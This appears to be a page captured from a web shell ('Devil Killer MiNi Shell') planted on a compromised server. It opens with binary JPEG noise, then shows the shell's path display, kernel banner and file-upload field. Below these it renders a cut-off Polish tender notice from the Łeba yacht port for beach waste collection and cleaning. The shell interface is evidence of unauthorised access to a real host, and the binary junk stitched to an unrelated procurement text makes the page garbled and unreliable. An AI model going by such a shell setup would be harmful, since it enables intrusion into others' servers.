JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/0016857601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wywóz odpadów komunalnych niesegregowanych z plaż i terenów przyplażowych oraz bieżące utrzymanie czystości plaż w Łebie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;PORT JACHTOWY W ŁEBIE&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 771251311</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jachtowa 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łeba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-360</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">port@leba.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.port.leba.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Port Jachtowy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wywóz odpadów komunalnych niesegregowanych z plaż i terenów przyplażowych oraz bieżące utrzymanie czystości plaż w Łebie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dce889ff-7ebf-4b90-b11b-660f8ac3a690</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00168576</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00168476/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wywóz odpadów komunalnych niesegregowanych z plaż i terenów przyplażowych oraz bieżące utrzymanie czystości plaż w Łebie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-dce889ff-7ebf-4b90-b11b-660f8ac3a690 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym<br/>a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod<br/>adresem https://ezamowienia.gov.pl<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy<br/>i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację<br/>za pomocą poczty elektronicznej na adres e-mail: jan.biernacki@port.leba.eu (nie dotyczy składania ofert).<br/>3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk<br/>„Przeglądaj postępowania/konkursy”).<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-dce889ff-7ebf-4b90-b11b-660f8ac3a690<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>7. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania<br/>konta na Platformie e-Zamówienia ani logowania.<br/>8. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących<br/>kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych.<br/>9. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów<br/>w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej,<br/>w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>10. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane<br/>w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków<br/>komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do<br/>komunikacji”).<br/>11. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy<br/>z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz<br/>z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je<br/>w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie<br/>pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zamawiający informuje, iż zgodnie z art. 18 ust. 1 PZP postępowanie o udzielenie zamówienia jest jawne.<br/>2. Protokół wraz załącznikami jest jawny i udostępniany na wniosek. Oferty wraz z załącznikami udostępnia się na wniosek niezwłocznie po otwarciu ofert, nie później jednak niż w terminie 3 dni od dnia otwarcia ofert. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.<br/>3. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Port Jachtowy w Łebie, mająca siedzibę pod adresem: ul. Jachtowa 8, 84-360 Łeba;<br/>b) Inspektorem ochrony danych osobowych w Porcie Jachtowym w Łebie jest Jan Tadeusz Biernacki, kontakt e-mail: info.port@leba.eu;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z ww. postępowaniem o udzielenie zamówienia publicznego;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy PZP;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">i)	nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PJ.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: bieżące utrzymanie czystości plaż oraz wywóz odpadów<br/>komunalnych niesegregowanych z plaż A, B, C oraz terenów przyplażowych w Łebie odpowiednio do instalacji przetwarzania odpadów komunalnych oraz instalacji odzysku i unieszkodliwiania odpadów, zgodnie z:<br/>− ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska,<br/>− ustawą z dnia 14 grudnia 2012 r. o odpadach,<br/>− ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,<br/>− rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.<br/>2.	Świadczenie usługi polega na dostarczeniu i ustawieniu pojemników (beczki o pojemności minimum 200 l) na odpady komunalne niesegregowane w niżej wskazanych miejscach oraz odbiorze i wywozie odpadów komunalnych niesegregowanych z ustawionych pojemników z częstotliwością:<br/>− w terminie od 1 do 6 maja częstotliwość wywożenia odpadów – minimum 1 x dziennie<br/>(godz. 6.00-8.00);<br/>− w terminie od 7 do 31 maja częstotliwość wywożenia odpadów – minimum 1 x na tydzień<br/>(piątek w godz. 6.00-8.00);<br/>− w miesiącu czerwcu częstotliwość wywożenia odpadów – minimum 1 x dziennie (godz. 6.00- 8.00)<br/>− w miesiącu lipcu i sierpniu częstotliwość wywożenia odpadów – minimum 2 x dziennie (godz. 6.00-8.00 i po godz. 18.00);<br/>− w miesiącu wrześniu częstotliwość wywożenia odpadów – minimum 1 x na dwa dni<br/>(w godz. 6.00-8.00)<br/>1) Plaża strzeżona „A” i „C” w Łebie (od strony „Czarnego Stawu” – wejście nr 21 do wejścia nr 13 – 70 szt. pojemników (beczki o pojemności minimum 200 l),<br/>2) Plaża strzeżona „B” w Łebie (od zejścia nr 25 ) – 20 szt. pojemników (beczki o pojemności minimum 200 l),<br/>3) Plaża niestrzeżona na odcinku od mola w kierunku zachodnim do granicy ze Słowińskim Parkiem Narodowym 40 szt. pojemników (beczki o pojemności minimum 200 l) – rozstawienie zgodnie z dyspozycją Kierownika Plaż lub upoważnionego pracownika spółki „Port Jachtowy” w Łebie,<br/>4) Plaża niestrzeżona w Łebie na odcinku na wschód od mola do wejścia nr 6 – 20 szt. Pojemników (beczki o pojemności minimum 200 l),<br/>5) Dojście do plaży po prawej stronie Hotelu Neptun odcinek o długości ok. 40 m – 2 szt.<br/>pojemników (poj. beczek minimum 200 l),<br/>6) Dojście do plaży po lewej stronie Hotelu Neptun odcinek o długości ok. 100 m – 2 szt.<br/>pojemników (poj. beczek minimum 200 l),<br/>7) Dojście do plaży przy Hotelu Łeba odcinek o długości ok. 230 m – 2 szt. pojemników<br/>(poj. beczek minimum 200 l),<br/>8) Dojście do plaży przy ul. Leśnej w Łebie odcinek o długości ok. 140 m – 2 szt. pojemników (poj.<br/>beczek minimum 200 l),<br/>9) Dojście do plaży przy ulicy Turystycznej w Łebie, odcinek o długości ok. 230 m – 2 szt.<br/>pojemników (poj. beczek minimum 200 l),<br/>10) Dojście do plaży przy Porcie Jachtowym w Łebie, odcinek o długości ok. 220 m – 2 szt.<br/>pojemników (poj. beczek minimum 200 l),<br/>11) Dojście do ruin starego kościoła Św. Mikołaja w Łebie odcinek o długości ok. 160 m - 2 szt.<br/>pojemników (poj. beczek minimum 200 l).<br/>3. Na plażach A, B, C strzeżonych pojemniki (beczki) na odpady komunalne zmieszane o poj. minimum 200 l należy ustawić pojedynczo w dwóch rzędach co ok. 25 m każdy rząd.<br/>4. Na plażach niestrzeżonych pojemniki (beczki) na odpady komunalne zmieszane o poj. min. 200 l<br/>należy ustawić pojedynczo w rzędzie co ok. 100 m jedna beczka – wyjątek stanowi plaża<br/>niestrzeżona na odcinku od nr 6 do nr 7, gdzie pojemniki (beczki) na odpady komunalne zmieszane<br/>o poj. minimum 200 l należy ustawić pojedynczo w jednym rzędzie co ok. 25 m jeden pojemnik<br/>(beczka).<br/>5. Łącznie zleceniobiorca zobowiązany jest do dostarczenia i rozstawienia 200 szt. pojemników (beczek) o pojemności 200l.<br/>6. Zleceniodawca może wyznaczyć inne ustawienie pojemników.<br/>7. Do obowiązków Wykonawcy należy również:<br/>1) bieżące utrzymanie czystości na plaży A, B, C w Łebie,<br/>2) odbieranie odpadów komunalnych zbieranych mechanicznie przez Zamawiającego z miejsc<br/>przez niego wskazanych,<br/>3) sprzątanie w tym zamiatanie wejścia na plaże od ul. ul. Turystycznej (wejście nr 25), Leśnej (wejście nr 20), ul. Sosnowej (wejście nr 18), za hotelem Łeba (nr 13), wejście nr 16 (tzw. „Sikorka”)<br/>4) przed sezonem letnim odpiaszczanie pomostów minimum 1 raz,<br/>5) odpiaszczanie ok. 180 mb gumowego zejścia dla osób niepełnosprawnych ruchowo minimum<br/>1 raz w tygodniu,<br/>6) sprzątanie terenów plażowych ok. 69 ha. Przez sprzątanie terenu plaż i wejść na plaże należy rozumieć zbieranie wszelkich odpadów komunalnych porzuconych lub wyrzuconych na brzeg morski i teren plaż,<br/>7) w przypadku niesprzyjających warunków atmosferycznych, uniemożliwiających prowadzenie<br/>usługi, Wykonawca zobowiązany jest do kontynuowania prac po ich ustąpieniu,<br/>8) podejmowanie z terenu plaż i dojść do plaż ciał padłych zwierząt (truchła).<br/>8. Ogólne wymagania dotyczące pracowników i sprzętu Wykonawcy:<br/>1) Wykonawca powinien dysponować kadrą, gwarantującą poprawne wykonanie zadania,<br/>2) operatorami sprzętu, kierowcami pojazdów mogą być wyłącznie osoby posiadające<br/>odpowiednie uprawnienie,<br/>3) zatrudnieni do wykonania usługi pracownicy mają posiadać estetyczną odzież roboczą z logo<br/>(nazwą) firmy i elementami odblaskowymi,<br/>4) w trakcie wykonywania prac należy przestrzegać przepisów BHP oraz przepisów o ruchu<br/>drogowym, utrzymaniu czystości i porządku w gminach,<br/>5) wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który zagwarantuje należyte wykonanie usługi i jednocześnie nie spowoduje uszkodzenia powierzchni oczyszczanych oraz obiektów na niej posadowionych,<br/>6) sprzęt użyty do realizacji usługi powinien być wyposażony w nowoczesne i estetyczne<br/>oznakowanie zgodnie z przepisami o ruchu drogowym,<br/>7) liczba i wydajność sprzętu musi gwarantować świadczenie usług, zgodnie z wymaganiami<br/>określonymi przez Zamawiającego w terminie przewidzianym umową, sprzęt używany do<br/>realizacji przedmiotu zamówienia musi być sprawny techniczne oraz utrzymany w gotowości do<br/>pracy,<br/>8) użyte urządzenia muszą posiadać aktualne dokumenty, dopuszczające do ruchu drogowego,<br/>zgodnie z przepisami obowiązującymi w tym zakresie,<br/>9. Usługi muszą być wykonane zgodnie z obowiązującymi polskimi normami i przepisami prawa<br/>z zachowaniem wymagań obowiązujących przepisów w szczególności bhp, ppoż., i branżowych,<br/>z zasadami współczesnej wiedzy technicznej, należytą starannością w ich wykonaniu, dobrą<br/>jakością, właściwą organizacją pracy i uzgodnieniami dokonanymi w trakcie realizacji prac,<br/>10. Wykonawca prac ponosi odpowiedzialność, za jakość ich wykonania oraz zastosowanych<br/>materiałów.<br/>11. Warunki realizacji zamówienia określa również wzór umowy (Część II SWZ).<br/>12. Ilekroć w treści SWZ, w tym w opisie przedmiotu zamówienia, użyte są znaki towarowe, patenty lub<br/>pochodzenie, europejskie oceny techniczne, aprobaty, certyfikaty, normy i inne wymienione<br/>w ustawie PZP, Zamawiający dopuszcza rozwiązanie równoważne i zastrzega sobie prawo do<br/>weryfikacji oferowanych rozwiązań równoważnych na etapie badania i oceny ofert. Wykonawca,<br/>który powołuje się na rozwiązania równoważne jest obowiązany udowodnić, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia.<br/>13.	Zamawiający dopuszcza powierzenie wykonania części zamówienia Podwykonawcy. Zamawiający nie zastrzega obowiązku wykonania przez wykonawcę kluczowych zadań.<br/>14.	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy Podwykonawcom, oraz podania nazw ewentualnych Podwykonawców, jeżeli są już znani.<br/>15.	Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób do wykonywania wskazanych poniżej czynności w trakcie realizacji zamówienia:<br/>	wykonywania czynności związanych z odbiorem i transportem nieczystości.<br/>16.	W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 26 czynności. Zamawiający uprawniony jest w szczególności do:<br/>a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów <br/>i dokonywania ich oceny,<br/>a)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,<br/>a)	przeprowadzania kontroli na miejscu wykonywania świadczenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) ilość dodatkowych pojazdów – zamiatarek samojezdnych - do sprzątania wejść na plaże - jakimi dysponuje Wykonawca – 30%<br/>3) dostarczenie dodatkowej ilości pojemników (beczek) o pojemności 200 l wraz z ich ustawieniem – na terenie uzgodnionym z Zamawiającym (znajdującym się obrębie niniejszego zamówienia) – 10 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium 